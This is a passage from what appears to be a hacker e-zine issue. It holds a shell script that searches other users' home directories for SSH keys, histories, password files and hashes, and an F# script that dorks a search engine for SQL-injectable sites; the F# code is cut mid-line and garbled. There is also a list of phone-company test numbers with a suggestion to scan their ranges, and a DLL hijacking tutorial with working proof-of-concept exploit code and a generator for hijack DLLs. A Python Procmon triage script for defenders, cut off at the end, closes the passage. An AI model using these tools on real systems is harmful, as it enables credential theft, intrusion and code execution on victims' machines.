  egrep -v '([.]+)$')

# Loop through the list and display on standard output
for f in $alist
do
  printf "%s\n" $f
done

# These are the filename/pathname/globbing/patterns/etc. to look for in the
# directories that we only have execute access on, i.e. no read access.
declare -a filez=(core .bash_history .profile .ptksh_history .sh_history \
  .history dead.letter mbox .Xauthority .forward .bitchxrc .pine-debug1 \
  .addressbook .bash_login .bash_logout .screenrc .addressbook.lu .cshrc \
  .bashrc .tcshrc .zshrc .nessusrc .nessusrc.cert .obv.friends .obv.shitlist \
  .festival_history .mysql_history .muttrc .ircrc .realplayerrc .rhosts \
  .htpasswd .passwd .procmailrc .zsh_history .zshhistory .BitchX/* .irssi/* \
  .lftp/* .ssh2/* .ssh/* .pgp/* .gnupg/* .mozilla/* .ncftp/* .subversion/* \
  public_html/* bin/* tmp/* temp/* * */* */*/* */*/*/*)

# Next, we parallelize the reads for the directories we DON'T have read access
# for. Again, the extended regular expression and home directory pathname glob
# can be modified to your liking. By default, home directories are checked for
# strings which look like sensitive and/or hex-encoded/encrypted data.
declare -a ret=`parallel -j6 'egrep -in "^[a-z]{4,}:[a-z0-9/.]{6,}| -p \
|pass |auth|secret|private|backdoor|trojan|rootkit|assword|admin|\
[0-9A-F]{32,40}"' /home/*/{} 2>/dev/null ::: ${filez}`

# Loop through and format output for fully qualified pathnames that are returned
for apath in $ret
do
  printf "%s\n" $apath
done

# Tell the shell how many files we found while we're exiting
exit ${#ret}

#EOF

----------------------------------------------------------------------------------------------------

(* GNY-SID is a SQL Injection Dorker script written in F# (pronounced "F-Sharp"), a functional
language developed by Don Syme of Microsoft Research for the .NET framework. It is now included
with Visual Studio; I happen to be using the 2010 Ultimate version. However, you can download an F#
interpreter separately from http://msdn.microsoft.com/fsharp -- and even though I said
"interpreter", F# is also a language that can be compiled to .NET's CIL (Common Intermediate
Language.) In this case, the code included below is intended to be interpreted.
As such, I have named the script GNY-SID.fsx as "fsx" is the filename extension used for F#
scripts. You can simply cut and paste the code into fsi.exe, or if you're using Visual Studio, use
the keystroke combinations CTRL-A (Select All) and ALT-ENTER to send the code to the F# Interactive
Window. FSI is just a REPL (Read-Eval-Print-Loop) as you've probably seen included with other
interpreted languages like Perl, Scheme, and Python. Although the FSI window doesn't currently
feature syntax highlighting or IntelliSense drop-downs like Visual Studio, you can still use the TAB
key to page through static functions provided by a particular module. For example, typing "List."
and then continually hitting TAB will provide core F# functions available to the list data type. I
personally have FSI listed in my Start Menu and edited the Shortcut Key in Properties to be
CTRL+ALT+F so I can quickly access the F# REPL at any time.

Okay, now onto how GNY-SID.fsx itself works: *)

(*%*%*%* GNY-SID.fsx by duper for GNY *%*%*%*)

// Open the standard .NET namespaces we'll be accessing
open System
open System.Net
open System.Web
open System.Text
open System.Text.RegularExpressions

// This namespace is exclusive to F# .. you can tell by the name ;)
open Microsoft.FSharp.Control.WebExtensions

// The first part of the search engine's CGI URL for finding web pages
let theUrl = [ "http://search.yahoo.com/search?p=" ]

// This will eventually be URL-encoded and appended to the URL above..
// It's the actual "dork" search string..
let ad0rq = [ "warning ociexecute \"on line\"" ]

// Extract matched subexpression strings (i.e., vulnerable web site URI's)
let rec printRegexMatches (m : Match) =
    let matchString = m.Groups.[1].Value.ToString()
    if not(matchString.Length.Equals(0)) then
        match m.Success with
        | true -> matchString :: printRegexMatches(m.NextMatch())
        | _ -> []
    else []

(* This is a tail-recursive function including the regular expression that
   matches the vulnerable web pages returned by the search engine. Obviously,
   if the search engine changes the formatting of its output HTML, then this
   regexp needs to be changed as well. Ideally, we would have access to a SOAP
   web service or RSS/ATOM feed where the XML formatting is guaranteed. *)
let printPageMatches(htm : string) =
    let re = new Regex("

Seq.map fetchAsync |> Async.Parallel |> Async.RunSynchronously

// ..and run it!
runAll();;

[==================================================================================================]

-=[ 0x05 Test Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

After doing some extensive Google dorking of the AT&T website, I came across quite a number of
documents containing lists of test numbers. The following numbers are from documents pertaining to
the Dallas, Houston, and Beaumont regions of Texas. All numbers listed have been confirmed as active
at the time of this issue's release. As milliwatts and certain other test numbers are of little
direct use to anyone who is not a field technician, one may instead take the opportunity to scan
their respective ranges in hope of discovering sensitive and interesting numbers. Descriptions of
test numbers are courteously provided by AT&T:

"102-type milliwatt provides connection to a 1004 HZ power source (milliwatt) required for one-way
transmission testing. Typical features are:

  - off-hook supervision
  - 175 millisecond delay
  - 1004 HZ at a reference level
  - 1 second interval of on-hook supervision, without tone, every 10 seconds until released
  - idle circuit termination during on-hook

Fixed PADs (TP2, TP9) and PAD switching signals are included in the test line, when required, to
furnish proper reference level at switch."
102-type (Milliwatt)
------------
214-220-0029  214-421-6276  214-489-4250  214-553-0587  214-599-9723  214-746-6309
214-821-2759  281-342-9699  281-346-1399  281-351-1499  281-353-1899  281-356-1499
281-367-1899  281-373-0904  281-376-1499  281-437-1899  281-444-1899  281-445-0125
281-449-1899  281-452-1899  281-456-0080  281-463-1899  281-464-9999  281-471-1499
281-482-1499  281-487-1899  281-489-7499  281-492-1899  281-497-4004  281-498-1499
281-592-1499  281-876-1405  409-245-0917  409-245-0930  409-245-1272  409-384-1200
409-385-1109  409-547-2278  409-746-2401  409-755-0809  409-763-3100  409-836-0538
409-836-1222  409-836-5416  409-866-9111  409-882-8301  409-899-9921  409-938-3241
409-945-8894  713-222-1099  713-433-3499  713-462-1499  713-522-3499  713-532-9999
713-571-9999  713-626-1499  713-638-4097  713-638-4098  713-651-9299  713-661-0088
713-723-2499  713-741-1499  713-771-6099  713-861-1793  713-871-0199  713-928-9020
713-946-1499  713-991-1499  832-242-9999  903-367-7528  903-378-7047  903-496-2607
903-560-1710  903-786-6237  903-873-2785  972-218-0916  972-224-5053  972-225-1399
972-226-3181  972-230-7828  972-241-7355  972-248-5052  972-270-9032  972-286-6419
972-287-1086  972-293-3731  972-308-0013  972-329-1900  972-335-7989  972-347-3264
972-370-0055  972-382-3257  972-472-6426  972-474-8703  972-479-0064  972-483-6122
972-515-3011  972-524-8151  972-542-2213  972-552-1009  972-635-0034  972-709-0277
972-722-8083  972-723-0019  972-782-8696  972-831-8042  972-875-3160  972-923-0047
972-980-4071  979-732-5646  979-885-3780

"105-type (local and toll) provides access to a far-end automatic transmission measuring system
(ATMS) responder. Two-way transmission, noise and gain-slope measurements may be made between the
far-end responder under control of automatically or manually directed test equipment."
105-type
------------
281-209-9999  281-342-9599  281-343-1998  281-346-1866  281-351-7121  281-353-2199
281-356-1330  281-367-2199  281-373-0907  281-376-1552  281-437-7429  281-442-2199
281-443-6932  281-444-0970  281-445-1009  281-458-1811  281-463-1199  281-469-2112
281-471-0851  281-474-3233  281-482-2199  281-486-1428  281-489-0044  281-492-1199
281-495-1999  281-497-4005  281-592-4199  281-876-1406  409-384-4639  409-724-3106
409-735-5392  409-762-7098  409-866-9296  409-899-9923  409-938-3238  409-945-8890
409-959-1050  409-971-2406  409-983-3102  409-983-3105  713-223-8847  713-451-2199
713-462-6399  713-472-0037  713-491-9987  713-522-3199  713-571-9997  713-626-1734
713-641-4899  713-651-9799  713-672-9202  713-681-1299  713-682-1499  713-729-2799
713-733-3910  713-741-8566  713-757-9912  713-790-1062  713-861-7399  713-871-1199
713-928-9021  713-946-8506  713-972-1080  713-981-1799  713-991-3728  832-251-0007
972-292-2125  972-734-3006

"108-type non-inverting loopback test line provides for digital testing capabilities between
digital exchanges and/or digital PBXs. The digital loopback test line provides a dialable, 4-wire
test line capability; it consists of circuitry that accepts and loops back received octets which
are retransmitted so that the positions of the bits within the octets are preserved."

108-type (Echo)
------------
281-227-9998  281-280-0034  281-320-0689  281-343-0785  281-346-2144  281-351-5445
281-356-1810  281-362-0684  281-373-0098  281-399-1580  281-440-1161  281-445-1195
281-471-0060  281-489-3122  281-497-4544  281-593-1299  281-876-1938  409-384-4311
409-763-8270  409-883-3099  409-895-0036  409-933-1301  409-945-8731  409-985-2911
713-472-0122  713-491-9995  713-522-2148  713-571-9998  713-621-2390  713-626-0666
713-638-4059  713-651-1443  713-681-9929  713-690-9987  713-721-1297  713-747-0047
713-757-9913  713-794-0484  713-861-0281  713-910-4522  832-251-0008

Silent lines go off-hook and remain silent until the calling party ends the call. They are
generally used to gauge the amount of line noise present.
While there were no silent lines listed, a few of the numbers must have been converted since.

Silent
------------
281-331-2297  281-437-2498  281-463-1012  281-484-6006  409-980-0450  713-433-3599
713-461-0501  972-747-9999

The following numbers were marked as test numbers but have either died or been assigned to other
purposes:

Incorrect
------------
214-375-9999 - VMB (469-855-9941)
214-398-5209 - HELO
214-429-9999 - VMB
214-465-9999 - "The feature you are attempting to use is either not recognized on this system or is
               not currently available for you to use" - 1-800-331-0500 (Message 8; CT01UN)
214-623-9999 - "It is not necessary to dial a 1 or 0 when calling this number"
214-654-9308 - DISCO
214-845-9999 - "Either the number you dialed is not a working number or must be dialed with the
               correct area code plus seven digits"
214-951-9999 - DISCO or NIS
214-987-3711 - DISCO
281-331-2009 - CBCAD (119T)
281-341-9499 - DISCO or NIS
281-458-8499 - reorder
281-479-1899 - DISCO or NIS
281-479-2199 - reorder
281-485-4304 - answering machine
281-485-6686 - fax
281-487-2299 - DISCO or NIS
281-488-1499 - DISCO or NIS
281-492-0652 - answering machine
281-498-0733 - DISCO or NIS
281-585-6649 - "not a working number" (Message 3; CT01UN)
281-689-2714 - DISCO or NIS
281-689-3123 - DISCO or NIS
281-825-1000 - VMB
281-938-3241 - CBCAD (119T)
409-233-1330 - reorder
409-234-2063 - ACB (119T)
409-234-7903 - reorder
409-234-7912 - CBCAD (??3)
409-239-3188 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-239-3193 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-265-0316 - reorder
409-265-0325 - reorder
409-265-5512 - CBCAD (119T)
409-279-5153 - reorder
409-279-6999 - reorder
409-279-9520 - reorder
409-291-0054 - HELO
409-291-8327 - apartment complex
409-336-8332 - CBCAD (119T)
409-336-8372 - reorder
409-398-2071 - reorder
409-398-2510 - reorder
409-398-5089 - CBCAD (119T)
409-532-0041 - NIS
409-532-1660 - NIS
409-532-2386 - NIS
409-543-1582 - "temporarily NIS" (Message 3; Switch 60)
409-543-8109 - HELO
409-543-8134 - "The number or code you have dialed is incorrect. Please check the number or code
               and try again." (Message 7; Switch 60)
409-560-3978 - CBCAD (119T)
409-560-3994 - reorder
409-564-0258 - CBCAD (119T)
409-598-2242 - reorder
409-598-2405 - reorder
409-598-2547 - reorder
409-724-3102 - DISCO or NIS
409-729-9908 - ring out to "Your party is not answering. Please try your call later. We're sorry,
               but your call will now be disconnected." (038T)
409-735-2199 - DISCO or NIS
409-736-0179 - busy
409-736-1828 - "we're sorry, your call cannot be completed to the access code you selected. Please
               check the code and dial again or call your long-distance company for assistance."
409-737-2668 - "not a working number" (Message 3; CT01UN)
409-738-2025 - doesn't even ring
409-740-3566 - CBCAD (092T)
409-740-8925 - reorder
409-740-8933 - CBCAD (003T)
409-752-3881 - DISCO or NIS
409-752-5680 - DISCO or NIS
409-769-1109 - DISCO or NIS
409-826-3150 - CBCAD (119T)
409-826-4869 - reorder
409-826-6600 - reorder
409-848-0692 - reorder
409-848-2309 - CBCAD (119T)
409-848-2317 - CBCAD (119T)
409-857-3400 - reorder
409-866-0691 - ring out to "Your party is not answering. Please try your call later. We're sorry,
               but your call will now be disconnected." (038T)
409-882-8303 - doesn't even ring
409-922-8179 - reorder
409-963-2359 - "we're sorry, your call cannot be completed to the access code you selected. Please
               check the code and dial again or call your long-distance company for assistance."
409-999-9999 - CBCAD (119T)
713-221-1678 - ring out, no bridge
713-271-1299 - DISCO or NIS
713-453-8599 - DISCO or NIS
713-467-0599 - DISCO or NIS
713-468-2099 - DISCO or NIS
713-469-1499 - Verizon Wireless "not available at this time" (Announcement 1; switch 12-3)
713-472-5199 - busy
713-474-2199 - DISCO or NIS
713-641-4799 - CBCAD (119T)
713-661-3099 - DISCO or NIS
713-663-1599 - DISCO or NIS
713-671-0140 - does not accept blocked Caller ID
713-672-1499 - "not a working number" (Message 3; CT01UN)
713-692-2199 - HELO
713-692-7099 - CBCAD (013T)
713-734-4399 - reorder
713-790-1799 - ring out, no bridge
713-884-1000 - "not a working number" (Message 3; CT01UN)
713-972-1194 - DISCO
903-327-9999 - CBCAD (119T)
903-441-9999 - HELO
903-467-9999 - VMB (not set up yet)
903-626-4085 - DISCO
936-349-9999 - DISCO or NIS (Brookvale? 2)
972-266-9999 - "Either the number you dialed is not a working number or must be dialed with the
               correct area code plus seven digits"
972-352-9999 - NIS (Message TX09080656)
972-570-9999 - DISCO or NIS
972-837-2119 - "Either the number you dialed is not a working number or must be dialed with the
               correct area code plus seven digits"
972-924-2095 - "Either the number you dialed is not a working number or must be dialed with the
               correct area code plus seven digits"

[==================================================================================================]

-=[ 0x06 Practical DLL Hijacking
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

Table of Contents

  I.   Introduction
  II.  Threat or No Threat?
  III. Background on DLL Hijacking
  IV.  Developing a Proof of Concept
  V.   Real-World Attack Examples
  VI.  Omg Hax

I. Introduction
===============

A recent craze has been forming over a new attack vector known as "DLL hijacking." This paper is
meant to inform the reader about what exactly this attack vector is, how it works, and how to
develop a proof of concept exploit for it. I will also be covering some more advanced topics, such
as how DLL hijacking may be used in a practical manner to deliver malicious payloads, and I will
also introduce a new utilization of this attack to silently execute code on a remote system.

II. Threat or No Threat?
========================

There has been a lot of discussion about whether or not DLL hijacking actually presents any sort of
security risk, and at first look, one may agree that these concerns hold some merit. In a typical
scenario, an attacker would already need to possess a significant level of access to the target
machine and its filesystem in order to perform a hijack, so the question remains: if such a level
of access has already been achieved, then why would time and resources be wasted on a DLL hijack?
Instead, an attacker would probably have the power to simply tamper with the targeted program itself
or execute a downloaded binary with the same user permissions. If an average DLL hijacking scenario
doesn't grant escalated privileges to an attacker, then what the heck use is it?

DLL hijacking is appropriate in situations where an attacker does not have actual interactive access
to a target system but is still able to pass files to it, such as when a user downloads content
through BitTorrent or plugs in a USB thumb drive. In both of these situations, DLL files may be
planted on a system in specific relation to other key files without the attacker maintaining any
interactive access to the machine at all. When executed properly, this attack is very effective and
very dangerous.
DLL hijacking won't bring about the destruction of all computing as the media generally makes any
vulnerability out to be (I'm assuming it won't), but it certainly has its place as a valid security
concern that must be addressed. In any regard, the vendors seem to be taking it seriously:

  From: "Adobe PSIRT"
  Subject: Adobe Report
  Date: Mon, August 30, 2010 11:26 am
  To: "storm@gonullyourself.org"
  Cc: "Adobe PSIRT"

  Hello sToRm,

  We noticed you posted a report on the Exploit database about an issue affecting an Adobe product:
  Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll), http://www.exploit-db.com/exploits/14741.
  We are currently investigating how to resolve the issue. We definitely appreciate your feedback
  about the security of our products, and encourage you to contact us directly in the event you find
  any further issues, or have additional information you would like to share about the issue already
  reported. Please contact us at PSIRT@adobe.com.

  Thank you very much,
  Wendy
  Adobe Product Security Incident Response Team

III. Background on DLL Hijacking
================================

First, let's answer the question of what a DLL file is. Basically, DLL files (the acronym stands for
"dynamic-link library") are Windows's version of shared libraries, which are packages of different
subroutines that grant greater functionality to programs. Directly quoting a Microsoft article, "For
example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related
functions." Numerous DLL files exist, each providing unique functionality. To cite another example,
when loaded by a program, the wsock32.dll file offers an interface to the Windows Sockets API.

Above, I mentioned that DLL files are shared libraries, not static libraries. This is a key piece of
information in the context of our attack. To further explain, shared libraries are loaded at
run-time, unlike static libraries which are loaded at compile-time.
The functionality provided by static libraries is compiled directly into the binary itself, whereas
the functionality provided by shared libraries is compiled separately and copied into memory once
loaded by the program. By using shared libraries, the overall program size decreases since the
executable is only storing a table of required functions instead of the actual functions
themselves. This process is referred to as dynamic linking.

Dynamic linking offers many advantages over static linking (which you may have figured the
definition of already), just as static linking offers many advantages over dynamic linking. For
instance, as previously stated, dynamic linking decreases the overall size of the final executable.
Shared libraries may also be easily updated without the need for recompiling the affected program.
Additionally, dynamic linking promotes the reuse of code and allows such libraries to be called upon
by multiple programs at the same time. Quoting the book "An Introduction to GCC: for the GNU
compilers gcc and g++," "Most operating systems also provide a virtual memory mechanism which allows
one copy of a shared library in physical memory to be used by all running programs, saving memory as
well as disk space." Dynamic linking provides both efficient usage of resources and flexibility in
programming.

This flexibility, however, is what causes programs to be vulnerable to DLL hijacking. When
specifying a DLL file to be loaded by a program, a programmer has various options. First, s/he may
call the library using an absolute path, such as "C:\Windows\system32\wsock32.dll". Second, s/he
may call the library using a relative path, such as "..\..\Windows\system32\wsock32.dll". Third,
s/he may call the library simply by naming "wsock32.dll" with no path at all. This third option is
of particular interest to us due to the way Windows attempts to locate DLL files with no definite
path.
The following lists are from various Microsoft KB articles and the ACROS Security Blog. Asterisks
denote families of functions.

When the LoadLibrary* functions are invoked, the following locations are searched for the requested
file:

  1. The directory from which the application loaded
  2. The system directory
  3. The 16-bit system directory
  4. The Windows directory
  5. The current working directory (CWD)
  6. The directories that are listed in the PATH environment variable

When the SearchPath, CreateProcess*, and LoadModule functions are invoked, the following locations
are searched for the requested file:

  1. The directory from which the application loaded
  2. The current working directory (CWD)
  3. The system directory
  4. The 16-bit system directory
  5. The Windows directory
  6. The directories that are listed in the PATH environment variable

When the ShellExecute* functions are invoked, the following locations are searched for the requested
file:

  1. The current working directory (CWD)
  2. The 32-bit System directory (Windows\System32)
  3. The 16-bit System directory (Windows\System)
  4. The Windows directory (Windows)
  5. The directories in the PATH environment variable
  6. The directories specified in the App Paths registry key

When the WinExec function is invoked, the following locations are searched for the requested file:

  1. The directory from which the application loaded
  2. The current working directory (CWD)
  3. The Windows system directory. The GetSystemDirectory function retrieves the path of this
     directory.
  4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory.
  5. The directories listed in the PATH environment variable

When the _spawn*p* and _exec*p* functions are invoked, the following locations are searched for the
requested file:

  1. The current working directory (CWD)
  2. The 32-bit system directory (Windows\System32)
  3. The Windows directory (Windows)
  4. The directories in the PATH environment variable

You may have already formulated an idea about what can happen here. If a DLL file is loaded by the
third method (a bare file name with no path), then there is a good chance that the load function is
searching a few other directories before finding it. If an attacker places a DLL file containing
malicious code in a directory that is searched before the correct one is, then it will be loaded
(with the privileges of the calling program) instead of the real DLL, leading to arbitrary code
execution. This is a DLL hijacking attack.

IV. Developing a Proof of Concept
=================================

It is fairly simple to develop a working exploit for DLL hijacking. In this section, I will guide
you through the process of finding a vulnerable application, identifying hijackable DLL files, and
creating your own DLL files to be hijacked. For the scope of this tutorial, I will target
Microsoft's Windows Contacts program (tested on Vista SP2 and 7 Ultimate).

First, download and extract Process Monitor (available at [1]), which we will use to track the
filesystem activity of Windows Contacts. After opening it, add the following filters:

  Process Name   is          wab.exe          then Include
  Path           ends with   .dll             then Include
  Result         is          NAME NOT FOUND   then Include

Doing this restricts the program's output just to what we are interested in (requests by wab.exe to
load DLL files that do not exist at the probed location). Create an empty file named "test.wab",
where .wab is a file extension associated with Windows Contacts. Double-click on test.wab, which
will open the Windows Contacts program.
Scrolling down, you should see something similar to the following events:

  wab.exe  CreateFile  C:\Program Files\Windows Mail\wab32res.dll                        NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\System32\wab32res.dll                                  NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\system\wab32res.dll                                    NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\wab32res.dll                                           NAME NOT FOUND
  wab.exe  CreateFile  C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll   NAME NOT FOUND
  wab.exe  CreateFile  C:\Program Files\Windows Mail\wab32res.dll                        NAME NOT FOUND
  wab.exe  CreateFile  C:\Perl\site\bin\wab32res.dll                                     NAME NOT FOUND
  wab.exe  CreateFile  C:\Perl\bin\wab32res.dll                                          NAME NOT FOUND
  wab.exe  CreateFile  C:\Program Files\PHP\wab32res.dll                                 NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\System32\wab32res.dll                                  NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\wab32res.dll                                           NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\System32\wbem\wab32res.dll                             NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll           NAME NOT FOUND
  wab.exe  CreateFile  C:\Windows\wbin\wab32res.dll                                      NAME NOT FOUND
  wab.exe  CreateFile  C:\Program Files\Nmap\wab32res.dll                                NAME NOT FOUND

This string of failed attempts to load a single DLL file is what we are looking for. First, the
directory that wab.exe was executed from is checked for wab32res.dll, where it is not found. Next,
it checks three Windows directories, where it is also not found. Then, it checks the current
working directory (where the .wab file was loaded from), and then, finally, it enumerates PATH as a
last resort. By observing this trend, we can assume that the program attempts to load wab32res.dll
using either the LoadLibrary or LoadLibraryEx function. In case you are interested, by removing the
"NAME NOT FOUND" filter, you can see all requests to load DLL files, successful or not.
By doing so, we can see that Windows Contacts was ultimately successful in loading wab32res.dll a
little further down:

  wab.exe  CreateFile                 C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  QueryBasicInformationFile  C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  CloseFile                  C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  CreateFile                 C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  CreateFileMapping          C:\Program Files\Common Files\System\wab32res.dll  FILE LOCKED WITH ONLY READERS
  wab.exe  CreateFileMapping          C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  Load Image                 C:\Program Files\Common Files\System\wab32res.dll  SUCCESS
  wab.exe  CloseFile                  C:\Program Files\Common Files\System\wab32res.dll  SUCCESS

So, now that we've identified wab32res.dll as a viable point of attack, the next step is to craft
our own DLL file. Since we've deduced that the DLL file is being loaded with one of the LoadLibrary
functions, we can employ the help of the DllMain callback function. We know this because, according
to [2], "When the system starts or terminates a process or thread, it calls the entry-point
function for each loaded DLL using the first thread of the process. The system also calls the
entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary
functions." This means that the contents of DllMain() in our code will be executed upon loading of
the DLL file. The following code is directly from the KB article just mentioned:

  BOOL WINAPI DllMain(
    __in  HINSTANCE hinstDLL,
    __in  DWORD fdwReason,
    __in  LPVOID lpvReserved
  );

So let's use this code and actually make it do something.
The classic proof of concept is to execute Calculator:

/*
Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2
http://www.gonullyourself.org/

gcc -shared -o wab32res.dll Contacts-DLL.c

.contact, .group, .p7c, .vcf, and .wab files are affected.
*/

#include <windows.h>
#include <stdlib.h>    /* exit() */

int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return 0;
}

Here, we have the DllMain() function call hax(), which simply executes calc.exe and exits. In case
you're wondering, you can determine which file extensions are associated with which programs through
Control Panel > Default Programs. Compile and put your new wab32res.dll in the same directory as any
.contact, .group, .p7c, .vcf, or .wab file. The file can be empty - just as long as it has one of
those file extensions. Open the file, and you should see a Calculator window open. :)

We are done with the proof of concept process for this program. However, if the targeted program
does not load a DLL using a LoadLibrary function, then we are not able to use DllMain() to execute
our code. If this is the case, then we must construct our new DLL file in a different manner. We
must create a template of every export function provided by the real DLL file, but instead of the
actual functionality, each function simply runs our hax() function.

For this example, I will use rpawinet.dll, which is loaded insecurely by Live! Cam Avatar Creator
(CrazyTalk4 for short). It's essentially some useless program that came pre-installed on my
computer, so I figured I would utilize it somehow. First, download and extract DLL Export Viewer
from [3]. Run the program, and load the DLL file you wish to examine (in this case, rpawinet.dll).
A list of the export functions should display in the window. Ctrl+A to select all, and Ctrl+S to
save to a text file.
The contents of the text file should look something like:

==================================================
Function Name    : HttpFilterBeginningTransaction
Address          : 0x100011d0
Relative Address : 0x000011d0
Ordinal          : 1 (0x1)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

==================================================
Function Name    : HttpFilterClose
Address          : 0x100011dd
Relative Address : 0x000011dd
Ordinal          : 2 (0x2)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

==================================================
Function Name    : HttpFilterOnBlockingOps
Address          : 0x100011ea
Relative Address : 0x000011ea
Ordinal          : 3 (0x3)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

==================================================
Function Name    : HttpFilterOnResponse
Address          : 0x100011f7
Relative Address : 0x000011f7
Ordinal          : 4 (0x4)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

==================================================
Function Name    : HttpFilterOnTransactionComplete
Address          : 0x10001204
Relative Address : 0x00001204
Ordinal          : 5 (0x5)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

==================================================
Function Name    : HttpFilterOpen
Address          : 0x10001211
Relative Address : 0x00001211
Ordinal          : 6 (0x6)
Filename         : rpawinet.dll
Full Path        : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type             : Exported Function
==================================================

Using a simple Perl script, we can enumerate the function names in this text file and output them
in correct format for our DLL source.

use strict;
use warnings;

# Reads the DLL Export Viewer text file named on the command line, writes C source to stdout
open FILE, '<', $ARGV[0] or die $!;

print "#include <windows.h>\n#include <stdlib.h>\n#define DllExport __declspec (dllexport)\n\n";
print "int hax();\n\n";   # forward declaration: the stubs call hax() before it is defined
while (<FILE>) {
    # every "Function Name : X" line becomes an exported stub named X
    print "DllExport void $1() { hax(); }\n" if ($_ =~ /Function Name\s+: (\w+)/);
}
print "\nint hax()\n{\n    WinExec(\"calc\", 0);\n    exit(0);\n    return 0;\n}\n";
close FILE;

This should output:

#include <windows.h>
#include <stdlib.h>
#define DllExport __declspec (dllexport)

int hax();

DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

int hax()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

I think you know what to do from here. :)

If you are interested, HD Moore has written a DLL hijacking auditing kit that automates checking
every associated file extension on one's computer to find potential program vulnerabilities. You can
find this tool at [4].

V. Real-World Attack Examples
=============================

There are many avenues for DLL hijacking that turn a number of seemingly safe activities into
potential security threats. I myself will not go too deeply into this section simply because other
articles have done a good job describing the vulnerable scenarios, so I will instead provide a guide
to these resources.

The article "Exploiting DLL Hijack in the real world" at [5] (mirror: [6]) provides a few good
examples of possible attack scenarios. The main points of the article are "Using a SMB/WebDav shared
folder," "A compressed package (.zip, .tar.gz, .rar etc)," "Torrents," and "Exploiting multiple
application hijacks."

The article "New DLL Hijacking Exploits (many!)" at [7] steps through an example WebDAV attack using
Metasploit.
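The defender's counterpart to the Process Monitor excerpt earlier in this article, as an added example that is not code from the original: once a Procmon trace is exported as CSV, its rows can be scanned for a DLL image mapped from outside the system and program directories while a copy of the same name was opened from a trusted location earlier in the same trace. The rows, the TRUSTED_ROOTS list and the extra_roots parameter are constructed for this example and are not Procmon features.

```python
"""Triage a Process Monitor CSV export for DLL images mapped from untrusted directories."""
import csv
import io
from collections import defaultdict

# Directories a DLL is normally expected to load from (assumption: default install on drive C:).
# Pass the audited application's own install directory via extra_roots if it lives elsewhere.
TRUSTED_ROOTS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Constructed sample in the shape of Procmon's CSV export (a subset of its columns), not a real
# capture: the first four rows are modelled on the wab32res.dll lookups in the article, the next
# two show the same name being opened and mapped from a user-writable folder instead.
SAMPLE_CSV = """\
"Process Name","Operation","Path","Result"
"wab.exe","CreateFile","C:\\Users\\alice\\Downloads\\wab32res.dll","NAME NOT FOUND"
"wab.exe","CreateFile","C:\\Windows\\System32\\wab32res.dll","NAME NOT FOUND"
"wab.exe","CreateFile","C:\\Program Files\\Common Files\\System\\wab32res.dll","SUCCESS"
"wab.exe","Load Image","C:\\Program Files\\Common Files\\System\\wab32res.dll","SUCCESS"
"wab.exe","CreateFile","C:\\Users\\alice\\Downloads\\wab32res.dll","SUCCESS"
"wab.exe","Load Image","C:\\Users\\alice\\Downloads\\wab32res.dll","SUCCESS"
"notepad.exe","Load Image","C:\\Windows\\System32\\kernel32.dll","SUCCESS"
"""


def parse_procmon_csv(text):
    """Yield (process, operation, path, result) tuples from a Procmon CSV export."""
    for row in csv.DictReader(io.StringIO(text)):
        yield row["Process Name"], row["Operation"], row["Path"], row["Result"]


def is_trusted(path, extra_roots=()):
    """True if path lies under one of the trusted roots (case-insensitive, as NTFS is)."""
    lowered = path.lower()
    return any(lowered.startswith(root.lower()) for root in TRUSTED_ROOTS + tuple(extra_roots))


def split_path(path):
    """Split a Windows path into (directory, lower-cased file name)."""
    directory, _, name = path.rpartition("\\")
    return directory, name.lower()


def find_untrusted_loads(text, extra_roots=()):
    """Return one finding per DLL image mapped (Load Image, SUCCESS) from outside the trusted roots.

    Each finding also lists the trusted directories in which the same DLL name was successfully
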